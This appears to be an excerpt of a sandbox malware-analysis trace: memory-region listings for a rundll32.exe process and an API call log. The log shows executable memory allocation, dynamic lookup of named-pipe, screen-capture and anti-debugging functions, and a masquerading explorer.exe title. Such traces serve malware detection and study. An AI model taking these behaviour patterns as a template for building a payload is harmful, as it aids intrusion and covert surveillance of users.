region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1921
start_va = 0x742a0000
end_va = 0x742bdfff
entry_point = 0x742a0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1922
start_va = 0x74350000
end_va = 0x744f4fff
entry_point = 0x74350000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll")
Region:
id = 1923
start_va = 0x74500000
end_va = 0x7463ffff
entry_point = 0x74500000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 1924
start_va = 0x74760000
end_va = 0x75b1efff
entry_point = 0x74760000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 1925
start_va = 0x75b80000
end_va = 0x75c3dfff
entry_point = 0x75b80000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1926
start_va = 0x75c40000
end_va = 0x75c83fff
entry_point = 0x75c40000
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")
Region:
id = 1927
start_va = 0x75d40000
end_va = 0x75dbafff
entry_point = 0x75d40000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 1928
start_va = 0x75dc0000
end_va = 0x75e03fff
entry_point = 0x75dc0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 1929
start_va = 0x75e70000
end_va = 0x75f1bfff
entry_point = 0x75e70000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1930
start_va = 0x760a0000
end_va = 0x760e2fff
entry_point = 0x760a0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1931
start_va = 0x76280000
end_va = 0x7630cfff
entry_point = 0x76280000
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")
Region:
id = 1932
start_va = 0x763b0000
end_va = 0x76441fff
entry_point = 0x763b0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1933
start_va = 0x764d0000
end_va = 0x769acfff
entry_point = 0x764d0000
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")
Region:
id = 1934
start_va = 0x769b0000
end_va = 0x76afcfff
entry_point = 0x769b0000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 1935
start_va = 0x76cb0000
end_va = 0x76ce5fff
entry_point = 0x76cb0000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 1936
start_va = 0x76cf0000
end_va = 0x76ea9fff
entry_point = 0x76cf0000
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")
Region:
id = 1937
start_va = 0x76eb0000
end_va = 0x76ebbfff
entry_point = 0x76eb0000
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")
Region:
id = 1938
start_va = 0x77050000
end_va = 0x7705efff
entry_point = 0x77050000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 1939
start_va = 0x1f0000
end_va = 0x1f0fff
entry_point = 0x1f0000
region_type = mapped_file
name = "rundll32.exe.mui"
filename = "\\Windows\\SysWOW64\\en-US\\rundll32.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\rundll32.exe.mui")
Region:
id = 1940
start_va = 0x2d0000
end_va = 0x2d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000002d0000"
filename = ""
Region:
id = 1941
start_va = 0x2e0000
end_va = 0x2e0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000002e0000"
filename = ""
Region:
id = 1942
start_va = 0x2f0000
end_va = 0x32ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 1943
start_va = 0x460000
end_va = 0x5e7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000460000"
filename = ""
Region:
id = 1944
start_va = 0x5f0000
end_va = 0x5fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005f0000"
filename = ""
Region:
id = 1945
start_va = 0x600000
end_va = 0x780fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000600000"
filename = ""
Region:
id = 1946
start_va = 0x790000
end_va = 0x7cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000790000"
filename = ""
Region:
id = 1947
start_va = 0x4930000
end_va = 0x5d2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004930000"
filename = ""
Region:
id = 1948
start_va = 0x74730000
end_va = 0x7475afff
entry_point = 0x74730000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1949
start_va = 0x76260000
end_va = 0x76278fff
entry_point = 0x76260000
region_type = mapped_file
name = "imagehlp.dll"
filename = "\\Windows\\SysWOW64\\imagehlp.dll" (normalized: "c:\\windows\\syswow64\\imagehlp.dll")
Region:
id = 1950
start_va = 0x77070000
end_va = 0x7718ffff
entry_point = 0x77070000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 1951
start_va = 0x7f667000
end_va = 0x7f669fff
entry_point = 0x0
region_type = private
name = "private_0x000000007f667000"
filename = ""
Region:
id = 1952
start_va = 0x330000
end_va = 0x35cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000330000"
filename = ""
Region:
id = 1953
start_va = 0x7d0000
end_va = 0x84ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000007d0000"
filename = ""
Region:
id = 1954
start_va = 0x5d30000
end_va = 0x5e3dfff
entry_point = 0x0
region_type = private
name = "private_0x0000000005d30000"
filename = ""
Region:
id = 1955
start_va = 0x74110000
end_va = 0x74184fff
entry_point = 0x74110000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 1956
start_va = 0x5e40000
end_va = 0x5f4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005e40000"
filename = ""
Region:
id = 1957
start_va = 0x5f50000
end_va = 0x6441fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005f50000"
filename = ""
Region:
id = 1958
start_va = 0x6450000
end_va = 0x694afff
entry_point = 0x0
region_type = private
name = "private_0x0000000006450000"
filename = ""
Region:
id = 1959
start_va = 0x6950000
end_va = 0x6e4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000006950000"
filename = ""
Region:
id = 1960
start_va = 0x5e40000
end_va = 0x5f3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005e40000"
filename = ""
Region:
id = 1961
start_va = 0x5f40000
end_va = 0x5f4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005f40000"
filename = ""
Region:
id = 1962
start_va = 0x6e50000
end_va = 0x734efff
entry_point = 0x0
region_type = private
name = "private_0x0000000006e50000"
filename = ""
Thread:
id = 214
os_tid = 0x60c
[0499.624] VirtualAlloc (lpAddress=0x0, dwSize=0x2d000, flAllocationType=0x3000, flProtect=0x40) returned 0x330000
[0499.626] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76bc0000
[0499.626] GetProcAddress (hModule=0x76bc0000, lpProcName="GetVersionExA") returned 0x76bd9fe0
[0499.626] GetProcAddress (hModule=0x76bc0000, lpProcName="ConnectNamedPipe") returned 0x76c00820
[0499.626] GetProcAddress (hModule=0x76bc0000, lpProcName="WriteFile") returned 0x76be6590
[0499.626] GetProcAddress (hModule=0x76bc0000, lpProcName="DisconnectNamedPipe") returned 0x76c00ba0
[0499.626] GetProcAddress (hModule=0x76bc0000, lpProcName="GetLastError") returned 0x76bd2db0
[0499.627] GetProcAddress (hModule=0x76bc0000, lpProcName="CreateNamedPipeA") returned 0x76bfdde0
[0499.627] GetProcAddress (hModule=0x76bc0000, lpProcName="CloseHandle") returned 0x76be5f20
[0499.627] GetProcAddress (hModule=0x76bc0000, lpProcName="ReadFile") returned 0x76be64a0
[0499.627] GetProcAddress (hModule=0x76bc0000, lpProcName="CreateFileA") returned 0x76be6170
[0499.627] GetProcAddress (hModule=0x76bc0000, lpProcName="GetCurrentThreadId") returned 0x76bd1b90
[0499.627] GetProcAddress (hModule=0x76bc0000, lpProcName="LCMapStringA") returned 0x76bdfc20
[0499.627] GetProcAddress (hModule=0x76bc0000, lpProcName="GetStringTypeW") returned 0x76bd79b0
[0499.627] GetProcAddress (hModule=0x76bc0000, lpProcName="GetStringTypeA") returned 0x76bdf930
[0499.627] GetProcAddress (hModule=0x76bc0000, lpProcName="SetEnvironmentVariableA") returned 0x76c02560
[0499.627] GetProcAddress (hModule=0x76bc0000, lpProcName="CompareStringW") returned 0x76be2230
[0499.627] GetProcAddress (hModule=0x76bc0000, lpProcName="FlushFileBuffers") returned 0x76be62a0
[0499.627] GetProcAddress (hModule=0x76bc0000, lpProcName="ExitThread") returned 0x771f2570
[0499.627] GetProcAddress (hModule=0x76bc0000, lpProcName="Sleep") returned 0x76bd77b0
[0499.627] GetProcAddress (hModule=0x76bc0000, lpProcName="GetTickCount") returned 0x76be57f0
[0499.628] GetProcAddress (hModule=0x76bc0000, lpProcName="ExitProcess") returned 0x76be74f0
[0499.628] GetProcAddress (hModule=0x76bc0000, lpProcName="LocalAlloc") returned 0x76bd8840
[0499.628] GetProcAddress (hModule=0x76bc0000, lpProcName="GlobalFree") returned 0x76be3a70
[0499.628] GetProcAddress (hModule=0x76bc0000, lpProcName="LCMapStringW") returned 0x76bd9a40
[0499.628] GetProcAddress (hModule=0x76bc0000, lpProcName="GlobalAlloc") returned 0x76bd9600
[0499.628] GetProcAddress (hModule=0x76bc0000, lpProcName="HeapFree") returned 0x76bd25e0
[0499.628] GetProcAddress (hModule=0x76bc0000, lpProcName="HeapAlloc") returned 0x771cda90
[0499.628] GetProcAddress (hModule=0x76bc0000, lpProcName="GetCommandLineA") returned 0x76bda3c0
[0499.628] GetProcAddress (hModule=0x76bc0000, lpProcName="GetModuleHandleW") returned 0x76bd9660
[0499.628] GetProcAddress (hModule=0x76bc0000, lpProcName="GetProcAddress") returned 0x76bd7940
[0499.628] GetProcAddress (hModule=0x76bc0000, lpProcName="EnterCriticalSection") returned 0x771d5e80
[0499.628] GetProcAddress (hModule=0x76bc0000, lpProcName="LeaveCriticalSection") returned 0x771d5e00
[0499.628] GetProcAddress (hModule=0x76bc0000, lpProcName="TerminateProcess") returned 0x76bdfbc0
[0499.628] GetProcAddress (hModule=0x76bc0000, lpProcName="GetCurrentProcess") returned 0x76bd2da0
[0499.629] GetProcAddress (hModule=0x76bc0000, lpProcName="UnhandledExceptionFilter") returned 0x76c028e0
[0499.629] GetProcAddress (hModule=0x76bc0000, lpProcName="SetUnhandledExceptionFilter") returned 0x76bda2c0
[0499.629] GetProcAddress (hModule=0x76bc0000, lpProcName="IsDebuggerPresent") returned 0x76bda790
[0499.629] GetProcAddress (hModule=0x76bc0000, lpProcName="HeapCreate") returned 0x76bd9950
[0499.629] GetProcAddress (hModule=0x76bc0000, lpProcName="HeapDestroy") returned 0x76bdd940
[0499.629] GetProcAddress (hModule=0x76bc0000, lpProcName="VirtualFree") returned 0x76bd8c70
[0499.629] GetProcAddress (hModule=0x76bc0000, lpProcName="DeleteCriticalSection") returned 0x771e9920
[0499.629] GetProcAddress (hModule=0x76bc0000, lpProcName="VirtualAlloc") returned 0x76bd8b70
[0499.629] GetProcAddress (hModule=0x76bc0000, lpProcName="HeapReAlloc") returned 0x771cbae0
[0499.629] GetProcAddress (hModule=0x76bc0000, lpProcName="GetStdHandle") returned 0x76bda060
[0499.629] GetProcAddress (hModule=0x76bc0000, lpProcName="GetModuleFileNameA") returned 0x76bda040
[0499.629] GetProcAddress (hModule=0x76bc0000, lpProcName="TlsGetValue") returned 0x76bd1ba0
[0499.629] GetProcAddress (hModule=0x76bc0000, lpProcName="TlsAlloc") returned 0x76bd9a70
[0499.629] GetProcAddress (hModule=0x76bc0000, lpProcName="TlsSetValue") returned 0x76bd1da0
[0499.630] GetProcAddress (hModule=0x76bc0000, lpProcName="TlsFree") returned 0x76bd9930
[0499.630] GetProcAddress (hModule=0x76bc0000, lpProcName="InterlockedIncrement") returned 0x76bd7520
[0499.630] GetProcAddress (hModule=0x76bc0000, lpProcName="SetLastError") returned 0x76bd2af0
[0499.630] GetProcAddress (hModule=0x76bc0000, lpProcName="InterlockedDecrement") returned 0x76bd7560
[0499.630] GetProcAddress (hModule=0x76bc0000, lpProcName="SetHandleCount") returned 0x76be4ca0
[0499.630] GetProcAddress (hModule=0x76bc0000, lpProcName="GetFileType") returned 0x76be6390
[0499.630] GetProcAddress (hModule=0x76bc0000, lpProcName="GetStartupInfoA") returned 0x76bd9730
[0499.630] GetProcAddress (hModule=0x76bc0000, lpProcName="FreeEnvironmentStringsA") returned 0x76c00e20
[0499.630] GetProcAddress (hModule=0x76bc0000, lpProcName="GetEnvironmentStrings") returned 0x76c01090
[0499.630] GetProcAddress (hModule=0x76bc0000, lpProcName="FreeEnvironmentStringsW") returned 0x76bda0f0
[0499.630] GetProcAddress (hModule=0x76bc0000, lpProcName="WideCharToMultiByte") returned 0x76bd75a0
[0499.630] GetProcAddress (hModule=0x76bc0000, lpProcName="GetEnvironmentStringsW") returned 0x76bda3b0
[0499.630] GetProcAddress (hModule=0x76bc0000, lpProcName="QueryPerformanceCounter") returned 0x76bd2dc0
[0499.630] GetProcAddress (hModule=0x76bc0000, lpProcName="GetCurrentProcessId") returned 0x76bd1d90
[0499.630] GetProcAddress (hModule=0x76bc0000, lpProcName="GetSystemTimeAsFileTime") returned 0x76bd2b90
[0499.631] GetProcAddress (hModule=0x76bc0000, lpProcName="GetModuleHandleA") returned 0x76bd9640
[0499.631] GetProcAddress (hModule=0x76bc0000, lpProcName="GetConsoleCP") returned 0x76be6860
[0499.631] GetProcAddress (hModule=0x76bc0000, lpProcName="GetConsoleMode") returned 0x76be6870
[0499.631] GetProcAddress (hModule=0x76bc0000, lpProcName="LoadLibraryA") returned 0x76bdd8d0
[0499.631] GetProcAddress (hModule=0x76bc0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76be6020
[0499.631] GetProcAddress (hModule=0x76bc0000, lpProcName="RtlUnwind") returned 0x76bd9a80
[0499.631] GetProcAddress (hModule=0x76bc0000, lpProcName="GetCPInfo") returned 0x76bd9fc0
[0499.631] GetProcAddress (hModule=0x76bc0000, lpProcName="GetACP") returned 0x76bd8770
[0499.631] GetProcAddress (hModule=0x76bc0000, lpProcName="GetOEMCP") returned 0x76bdfd10
[0499.631] GetProcAddress (hModule=0x76bc0000, lpProcName="IsValidCodePage") returned 0x76bda090
[0499.631] GetProcAddress (hModule=0x76bc0000, lpProcName="SetFilePointer") returned 0x76be6530
[0499.631] GetProcAddress (hModule=0x76bc0000, lpProcName="WriteConsoleA") returned 0x76be6910
[0499.631] GetProcAddress (hModule=0x76bc0000, lpProcName="GetConsoleOutputCP") returned 0x76be6880
[0499.631] GetProcAddress (hModule=0x76bc0000, lpProcName="WriteConsoleW") returned 0x76be6920
[0499.632] GetProcAddress (hModule=0x76bc0000, lpProcName="MultiByteToWideChar") returned 0x76bd2d60
[0499.632] GetProcAddress (hModule=0x76bc0000, lpProcName="SetStdHandle") returned 0x76c026a0
[0499.632] GetProcAddress (hModule=0x76bc0000, lpProcName="HeapSize") returned 0x771e4f40
[0499.632] GetProcAddress (hModule=0x76bc0000, lpProcName="GetLocaleInfoA") returned 0x76bde240
[0499.632] GetProcAddress (hModule=0x76bc0000, lpProcName="CompareStringA") returned 0x76bddb10
[0499.632] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74500000
[0499.632] GetProcAddress (hModule=0x74500000, lpProcName="SetProcessWindowStation") returned 0x745357a0
[0499.632] GetProcAddress (hModule=0x74500000, lpProcName="GetThreadDesktop") returned 0x74535550
[0499.632] GetProcAddress (hModule=0x74500000, lpProcName="CloseWindowStation") returned 0x74535870
[0499.632] GetProcAddress (hModule=0x74500000, lpProcName="GetProcessWindowStation") returned 0x74534f50
[0499.632] GetProcAddress (hModule=0x74500000, lpProcName="OpenInputDesktop") returned 0x74538be0
[0499.632] GetProcAddress (hModule=0x74500000, lpProcName="CloseDesktop") returned 0x74535780
[0499.632] GetProcAddress (hModule=0x74500000, lpProcName="GetDC") returned 0x74534dd0
[0499.632] GetProcAddress (hModule=0x74500000, lpProcName="ReleaseDC") returned 0x745189f0
[0499.633] GetProcAddress (hModule=0x74500000, lpProcName="GetDesktopWindow") returned 0x74511520
[0499.633] GetProcAddress (hModule=0x74500000, lpProcName="SetThreadDesktop") returned 0x74535630
[0499.633] GetProcAddress (hModule=0x74500000, lpProcName="GetSystemMetrics") returned 0x745155d0
[0499.633] GetProcAddress (hModule=0x74500000, lpProcName="GetLastInputInfo") returned 0x7452d000
[0499.633] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x769b0000
[0499.633] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteDC") returned 0x76a30550
[0499.633] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteObject") returned 0x76a30050
[0499.634] GetProcAddress (hModule=0x769b0000, lpProcName="SelectObject") returned 0x76a2fc80
[0499.634] GetProcAddress (hModule=0x769b0000, lpProcName="CreateCompatibleDC") returned 0x76a31f90
[0499.634] GetProcAddress (hModule=0x769b0000, lpProcName="CreateCompatibleBitmap") returned 0x76a322d0
[0499.634] GetProcAddress (hModule=0x769b0000, lpProcName="GetDIBits") returned 0x76a30dc0
[0499.634] GetProcAddress (hModule=0x769b0000, lpProcName="GetObjectA") returned 0x76a40530
[0499.634] GetProcAddress (hModule=0x769b0000, lpProcName="BitBlt") returned 0x76a32170
[0499.634] NtFlushInstructionCache (ProcessHandle=0xffffffff, BaseAddress=0x0, NumberOfBytesToFlush=0x0) returned 0x0
[0499.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f8b0 | out: lpSystemTimeAsFileTime=0x18f8b0*(dwLowDateTime=0xf97318df, dwHighDateTime=0x1d3a68b))
[0499.634] GetCurrentProcessId () returned 0xac4
[0499.634] GetCurrentThreadId () returned 0x60c
[0499.634] GetTickCount () returned 0x8cb19
[0499.634] QueryPerformanceCounter (in: lpPerformanceCount=0x18f8a8 | out: lpPerformanceCount=0x18f8a8*=2026792542) returned 1
[0499.634] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76bc0000
[0499.635] GetProcAddress (hModule=0x76bc0000, lpProcName="FlsAlloc") returned 0x76bda330
[0499.635] GetProcAddress (hModule=0x76bc0000, lpProcName="FlsGetValue") returned 0x76bd7580
[0499.635] GetProcAddress (hModule=0x76bc0000, lpProcName="FlsSetValue") returned 0x76bd9910
[0499.635] GetProcAddress (hModule=0x76bc0000, lpProcName="FlsFree") returned 0x76bdf400
[0499.635] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76bc0000
[0499.635] GetProcAddress (hModule=0x76bc0000, lpProcName="EncodePointer") returned 0x771ef190
[0499.635] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76bc0000
[0499.635] GetProcAddress (hModule=0x76bc0000, lpProcName="EncodePointer") returned 0x771ef190
[0499.635] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76bc0000
[0499.635] GetProcAddress (hModule=0x76bc0000, lpProcName="EncodePointer") returned 0x771ef190
[0499.636] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76bc0000
[0499.636] GetProcAddress (hModule=0x76bc0000, lpProcName="EncodePointer") returned 0x771ef190
[0499.636] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76bc0000
[0499.636] GetProcAddress (hModule=0x76bc0000, lpProcName="EncodePointer") returned 0x771ef190
[0499.636] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76bc0000
[0499.636] GetProcAddress (hModule=0x76bc0000, lpProcName="EncodePointer") returned 0x771ef190
[0499.636] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76bc0000
[0499.636] GetProcAddress (hModule=0x76bc0000, lpProcName="EncodePointer") returned 0x771ef190
[0499.637] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76bc0000
[0499.637] GetProcAddress (hModule=0x76bc0000, lpProcName="DecodePointer") returned 0x771ea200
[0499.637] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76bc0000
[0499.637] GetProcAddress (hModule=0x76bc0000, lpProcName="DecodePointer") returned 0x771ea200
[0499.637] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76bc0000
[0499.637] GetProcAddress (hModule=0x76bc0000, lpProcName="EncodePointer") returned 0x771ef190
[0499.638] GetProcAddress (hModule=0x76bc0000, lpProcName="DecodePointer") returned 0x771ea200
[0499.638] GetCurrentThreadId () returned 0x60c
[0499.638] GetCommandLineA () returned="C:\\Windows\\syswow64\\rundll32.exe"
[0499.638] GetEnvironmentStringsW () returned 0x375780*
[0499.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Windows\\System32", cchWideChar=1475, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1475
[0499.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Windows\\System32", cchWideChar=1475, lpMultiByteStr=0x8407c8, cbMultiByte=1475, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Windows\\System32", lpUsedDefaultChar=0x0) returned 1475
[0499.638] FreeEnvironmentStringsW (penv=0x375780) returned 1
[0499.638] GetStartupInfoA (in: lpStartupInfo=0x18f800 | out: lpStartupInfo=0x18f800*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\explorer.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0499.638] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
[0499.638] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
[0499.638] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
[0499.638] SetHandleCount (uNumber=0x20) returned 0x20
[0499.638] GetLastError () returned 0x0
[0499.638] SetLastError (dwErrCode=0x0)
[0499.638] GetLastError () returned 0x0
[0499.638] SetLastError (dwErrCode=0x0)
[0499.638] GetLastError () returned 0x0
[0499.638] SetLastError (dwErrCode=0x0)
[0499.638] GetACP () returned 0x4e4
[0499.638] GetLastError () returned 0x0
[0499.638] SetLastError (dwErrCode=0x0)
[0499.638] IsValidCodePage (CodePage=0x4e4) returned 1
[0499.638] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f7e0 | out: lpCPInfo=0x18f7e0) returned 1
[0499.638] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f2ac | out: lpCPInfo=0x18f2ac) returned 1
[0499.638] GetLastError () returned 0x0
[0499.638] SetLastError (dwErrCode=0x0)
[0499.638] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f23c | out: lpCharType=0x18f23c) returned 1
[0499.638] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f6c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0499.638] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f6c0, cbMultiByte=256, lpWideCharStr=0x18f028, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ톶ィ4Ā") returned 256
[0499.638] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ톶ィ4Ā", cchSrc=256, lpCharType=0x18f2c0 | out: lpCharType=0x18f2c0) returned 1
[0499.639] GetLastError () returned 0x0
[0499.639] SetLastError (dwErrCode=0x0)
[0499.639] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1
[0499.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f6c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0499.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f6c0, cbMultiByte=256, lpWideCharStr=0x18eff8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ4Ā") returned 256
